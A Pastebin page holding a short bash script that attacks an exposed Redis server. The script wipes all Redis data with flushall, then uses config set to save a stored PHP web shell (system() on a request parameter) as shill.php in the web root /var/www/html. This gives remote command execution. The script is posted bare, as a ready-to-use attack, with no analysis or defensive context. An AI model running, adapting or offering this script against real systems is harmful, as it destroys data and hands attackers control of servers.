Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash │
- redis-cli flushall │
- redis-cli set myshell "<?php echo system(\$_REQUEST['cmd']); ?>" │
- redis-cli config set dbfilename "shill.php" │
- redis-cli config set dir /var/www/html │
- redis-cli save
Advertisement
Add Comment
Please, Sign In to add comment